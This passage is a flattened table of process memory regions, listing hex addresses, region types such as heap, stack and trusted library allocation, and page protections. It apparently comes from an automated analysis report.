direct allocation
|
page read and write
|
||
499B000
|
heap
|
page read and write
|
||
1A3FF7E000
|
stack
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
8BA0000
|
trusted library allocation
|
page read and write
|
||
2F20000
|
heap
|
page read and write
|
||
2B2C000
|
heap
|
page read and write
|
||
25C35000
|
heap
|
page read and write
|
||
2BEC000
|
heap
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
2B7B000
|
heap
|
page read and write
|
||
546B000
|
trusted library allocation
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
2543F000
|
heap
|
page read and write
|
||
838000
|
heap
|
page read and write
|
||
823000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
2B0B000
|
stack
|
page read and write
|
||
7FFD9B965000
|
trusted library allocation
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
935D000
|
heap
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
2B00000
|
heap
|
page read and write
|
||
9357000
|
heap
|
page read and write
|
||
5803000
|
trusted library allocation
|
page read and write
|
||
120F04CF000
|
heap
|
page read and write
|
||
81D000
|
heap
|
page read and write
|
||
8E90000
|
trusted library allocation
|
page execute and read and write
|
||
12080001000
|
trusted library allocation
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
4A10000
|
heap
|
page read and write
|
||
4D48000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
2543B000
|
heap
|
page read and write
|
||
9830000
|
direct allocation
|
page execute and read and write
|
||
400000
|
system
|
page execute and read and write
|
||
120EE120000
|
heap
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
49BB000
|
heap
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
583B000
|
trusted library allocation
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
4A17000
|
heap
|
page read and write
|
||
120EE3A0000
|
heap
|
page read and write
|
||
2D2D000
|
heap
|
page read and write
|
||
5741000
|
trusted library allocation
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
26B78000
|
heap
|
page read and write
|
||
2F80000
|
trusted library allocation
|
page read and write
|
||
4A17000
|
heap
|
page read and write
|
||
7DA0000
|
trusted library allocation
|
page read and write
|
||
12081E9E000
|
trusted library allocation
|
page read and write
|
||
9355000
|
heap
|
page read and write
|
||
1A40A4D000
|
stack
|
page read and write
|
||
58C6000
|
trusted library allocation
|
page read and write
|
||
4D50000
|
trusted library section
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
2B94000
|
heap
|
page read and write
|
||
2540B000
|
heap
|
page read and write
|
||
888D000
|
stack
|
page read and write
|
||
337B000
|
heap
|
page read and write
|
||
2F90000
|
heap
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
CB45000
|
direct allocation
|
page execute and read and write
|
||
87D0000
|
trusted library allocation
|
page read and write
|
||
4D8D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
32D0000
|
heap
|
page read and write
|
||
12080482000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
8DCE000
|
stack
|
page read and write
|
||
120EE233000
|
heap
|
page read and write
|
||
120F05BF000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
45DF000
|
stack
|
page read and write
|
||
26645000
|
heap
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
1A3FBF9000
|
stack
|
page read and write
|
||
4D83000
|
trusted library allocation
|
page execute and read and write
|
||
120EE299000
|
heap
|
page read and write
|
||
4DB5000
|
heap
|
page read and write
|
||
26649000
|
heap
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
49A8000
|
heap
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
4D60000
|
trusted library section
|
page read and write
|
||
25291000
|
heap
|
page read and write
|
||
49B3000
|
heap
|
page read and write
|
||
78DE000
|
stack
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
120EE160000
|
heap
|
page read and write
|
||
4E8D000
|
heap
|
page read and write
|
||
25383000
|
heap
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
120F0526000
|
heap
|
page read and write
|
||
8C25000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
4997000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
4A1D000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
15D000
|
stack
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
831000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
8F30000
|
direct allocation
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
50C8000
|
heap
|
page read and write
|
||
732F000
|
stack
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
120F027C000
|
heap
|
page read and write
|
||
934D000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
1A3F5FE000
|
stack
|
page read and write
|
||
120F0261000
|
heap
|
page read and write
|
||
8EF0000
|
trusted library allocation
|
page read and write
|
||
569A000
|
trusted library allocation
|
page read and write
|
||
2BBF000
|
unkown
|
page read and write
|
||
1A3FD77000
|
stack
|
page read and write
|
||
26130000
|
heap
|
page read and write
|
||
7FFD9B967000
|
trusted library allocation
|
page read and write
|
||
4D99000
|
trusted library allocation
|
page read and write
|
||
19D000
|
stack
|
page read and write
|
||
2950000
|
heap
|
page readonly
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
2543F000
|
heap
|
page read and write
|
||
49B1000
|
heap
|
page read and write
|
||
80F000
|
heap
|
page read and write
|
||
88D0000
|
trusted library allocation
|
page read and write
|
||
87E0000
|
trusted library allocation
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
4910000
|
heap
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|